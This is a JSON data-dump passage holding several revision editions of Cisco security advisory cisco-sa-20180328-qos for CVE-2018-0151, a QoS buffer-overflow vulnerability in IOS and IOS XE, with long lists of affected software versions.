"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2021-09-02T22:32:55", "history": [{"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-03-28T14:50:39", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2018-04-06T14:38:06", "history": [], "viewCount": 188, "enchantments": {"score": {"modified": "2018-04-06T14:38:06", "value": 3.3, "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "affectedSoftware": [{"name": "IOS", "operator": "eq", "version": "15.6SP"}, {"name": "IOS", "operator": "eq", "version": "15.3JF"}, {"name": "IOS", "operator": "eq", "version": "15.5T"}, {"name": "IOS", "operator": "eq", "version": "15.5M"}, {"name": "IOS", "operator": "eq", "version": "15.3SY"}, {"name": "IOS", "operator": "eq", "version": "15.5S"}, {"name": "IOS", "operator": "eq", "version": "15.6T"}, {"name": "IOS", "operator": "eq", "version": "15.6M"}, {"name": "IOS", "operator": "eq", "version": "15.6SN"}, {"name": "IOS", "operator": "eq", "version": "15.3JDA"}, {"name": "IOS", "operator": "eq", "version": "15.2E"}, {"name": "IOS", "operator": "eq", "version": "15.7M"}, {"name": "IOS", "operator": "eq", "version": "15.5SN"}, {"name": "IOS", "operator": "eq", "version": "15.6S"}, {"name": "IOS", "operator": "eq", "version": "15.3JD"}], "vendorCvss": {}}, "lastseen": "2018-04-06T14:38:06", "differentElements": ["affectedSoftware", "modified"], "edition": 1}, {"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-26T19:43:27", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2018-04-27T02:42:57", "history": [], "viewCount": 206, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "affectedSoftware": [{"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.6"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18S"}, {"name": "IOS", "operator": "eq", "version": "15.6SP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18SP"}, {"name": "IOS", "operator": "eq", "version": "15.3JF"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.6E"}, {"name": "IOS", "operator": "eq", "version": "15.5T"}, {"name": "IOS", "operator": "eq", "version": "15.5M"}, {"name": "IOS", "operator": "eq", "version": "15.3SY"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16S"}, {"name": "IOS", "operator": "eq", "version": "15.5S"}, {"name": "IOS", "operator": "eq", "version": "15.6T"}, {"name": "IOS", "operator": "eq", "version": "15.6M"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15S"}, {"name": "IOS", "operator": "eq", "version": "15.6SN"}, {"name": "IOS", "operator": "eq", "version": "15.3JDA"}, {"name": "IOS", "operator": "eq", "version": "15.2E"}, {"name": "IOS", "operator": "eq", "version": "15.7M"}, {"name": "IOS", "operator": "eq", "version": "15.5SN"}, {"name": "IOS", "operator": "eq", "version": "15.6S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.5"}, {"name": "IOS", "operator": "eq", "version": "15.3JD"}], "vendorCvss": {}}, "lastseen": "2018-04-27T02:42:57", "differentElements": ["description", "modified"], "edition": 2}, {"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds for most affected Cisco products that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-27T21:15:15", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2018-04-27T22:48:12", "history": [], "viewCount": 219, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "affectedSoftware": [{"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.6"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18S"}, {"name": "IOS", "operator": "eq", "version": "15.6SP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18SP"}, {"name": "IOS", "operator": "eq", "version": "15.3JF"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.6E"}, {"name": "IOS", "operator": "eq", "version": "15.5T"}, {"name": "IOS", "operator": "eq", "version": "15.5M"}, {"name": "IOS", "operator": "eq", "version": "15.3SY"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16S"}, {"name": "IOS", "operator": "eq", "version": "15.5S"}, {"name": "IOS", "operator": "eq", "version": "15.6T"}, {"name": "IOS", "operator": "eq", "version": "15.6M"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15S"}, {"name": "IOS", "operator": "eq", "version": "15.6SN"}, {"name": "IOS", "operator": "eq", "version": "15.3JDA"}, {"name": "IOS", "operator": "eq", "version": "15.2E"}, {"name": "IOS", "operator": "eq", "version": "15.7M"}, {"name": "IOS", "operator": "eq", "version": "15.5SN"}, {"name": "IOS", "operator": "eq", "version": "15.6S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.5"}, {"name": "IOS", "operator": "eq", "version": "15.3JD"}], "vendorCvss": {}}, "lastseen": "2018-04-27T22:48:12", "differentElements": ["affectedSoftware"], "edition": 3}, {"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "32cd1fba0314d45d903efaf7b835ec32", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds for most affected Cisco products that address this vulnerability.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos\"]\nThis advisory is part of the March 28, 2018, release of the Cisco IOS and IOS XE Software Security Advisory Bundled Publication, which includes 20 Cisco Security Advisories that describe 22 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: March 2018 Semiannual Cisco IOS and IOS XE Software Security Advisory Bundled Publication [\"https://tools.cisco.com/security/center/viewErp.x?alertId=ERP-66682\"].", "published": "2018-03-28T16:00:00", "modified": "2018-04-27T21:15:15", "cvss": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "cvss2": {}, "cvss3": {}, "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos", "reporter": "Cisco", "references": ["https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos"], "cvelist": ["CVE-2018-0151"], "immutableFields": [], "lastseen": "2020-06-22T10:57:47", "history": [], "viewCount": 257, "enchantments": {"dependencies": {"modified": "2020-06-22T10:57:47", "references": [{"idList": ["CISCO-SA-20180328-QOS-IOS.NASL", "CISCO-SA-20180328-QOS-IOSXE.NASL"], "type": "nessus"}, {"idList": ["MYHACK58:62201889900"], "type": "myhack58"}, {"idList": ["ICSA-18-107-03"], "type": "ics"}, {"idList": ["CVE-2018-0151"], "type": "cve"}, {"idList": ["THREATPOST:B7DF4F28933004E3E4D52762786306C4"], "type": "threatpost"}, {"idList": ["CISCO-SA-20180328-QOS"], "type": "cisco"}], "rev": 2}, "score": {"modified": "2020-06-22T10:57:47", "rev": 2, "value": 8.5, "vector": "NONE"}}, "objectVersion": "1.4", "affectedSoftware": [{"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M3a"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)T3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M3"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.4cS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.4eS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)S4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)SN"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.3S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)SN"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.0SP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.2SP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.0aS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)T2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)T2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.3S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.1.3"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.4aS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.2S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)S3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.0aS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.6"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3.1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3.5"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.7(3)M0a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.4S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.1S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.0bS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15.4S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.6S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)S2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.4.1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14.0S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)S2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15.3S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)SN2"}, {"name": "IOS", "operator": "eq", "version": "15.6SP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)T4"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.3SP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17.2S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M2a"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)S3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S6b"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M0a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.4bS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)S2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M5"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)S4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1SP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)SN"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.4S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)SN1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14.3S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)T"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)T3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)S4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.2bS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(6)SN"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M1b"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18SP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M2a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3.2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(7)SN1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(7)SN2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M0a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.5bS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M1a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17.1aS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.5.1b"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3.5b"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15.1cS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)S3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)T0a"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)T"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.0cS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3.4"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)T"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.4.2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S6"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)S1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(5)SN"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.1.1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)SN1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.2.2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)T0a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3.3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)T1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14.4S"}, {"name": "IOS", "operator": "eq", "version": "15.5T"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)SP3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S5"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14.1S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15.1S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15.0S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17.3S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)SN"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.5.2"}, {"name": "IOS", "operator": "eq", "version": "15.5M"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.2.1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.0S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)SP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M4c"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1gSP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.2aS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.1aS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(7)SN"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)SP2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.3aSP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S1a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.2aSP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)S4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15.2S"}, {"name": "IOS", "operator": "eq", "version": "15.5S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.3aS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)T3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)T2"}, {"name": "IOS", "operator": "eq", "version": "15.6T"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M4b"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)T1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)S3"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S0a"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)T3"}, {"name": "IOS", "operator": "eq", "version": "15.6M"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1aSP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.7(3)M"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M6"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.1.2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.15S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.5.1a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.6.1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.5S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1cSP"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(3)M2"}, {"name": "IOS", "operator": "eq", "version": "15.6SN"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.3.1a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1hSP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17.1S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)S1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)SP1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)S1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(2)SN"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M6a"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)SN0a"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M4a"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)SN"}, {"name": "IOS", "operator": "eq", "version": "15.7M"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.2S"}, {"name": "IOS", "operator": "eq", "version": "15.5SN"}, {"name": "IOS", "operator": "eq", "version": "15.6S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.6bS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17.0S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1iSP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14.2S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.17.4S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.3bSP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.4dS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)T1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.0S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)S"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.5aS"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)SN3"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.5.1"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.16.4gS"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1bSP"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.2"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.14S"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)S2"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(1)T"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(1)T4"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "16.5"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(2)S1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)M1"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.6(4)SN"}, {"name": "Cisco IOS", "operator": "eq", "version": "15.5(3)S6a"}, {"name": "Cisco IOS XE Software", "operator": "eq", "version": "3.18.1S"}], "vendorCvss": {}}, "lastseen": "2020-06-22T10:57:47", "differentElements": ["affectedSoftware", "cvss2", "cvss3"], "edition": 4}, {"bulletin": {"id": "CISCO-SA-20180328-QOS", "hash": "bc9e020b52da637f5b3e13dadcc5ad996ba555864c4d565fe0883ab565422b4d", "type": "cisco", "bulletinFamily": "software", "title": "Cisco IOS and IOS XE Software Quality of Service Remote Code Execution Vulnerability", "description": "A vulnerability in the quality of service (QoS) subsystem of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or execute arbitrary code with elevated privileges.\n\nThe vulnerability is due to incorrect bounds checking of certain values in packets that are destined for UDP port 18999 of an affected device. An attacker could exploit this vulnerability by sending malicious packets to an affected device. When the packets are processed, an exploitable buffer overflow condition may occur. A successful exploit could allow the attacker to execute arbitrary code on the affected device with elevated privileges. The attacker could also leverage this vulnerability to cause the device to reload, causing a temporary DoS condition while the device is reloading.\n\nThe malicious packets must be destined to and processed by an affected device. Traffic transiting a device will not trigger the vulnerability.\n\nCisco has released software updates that address this vulnerability. There are workarounds for most affected Cisco products that address this vulnerability.\n\nThis advisory is available at the following 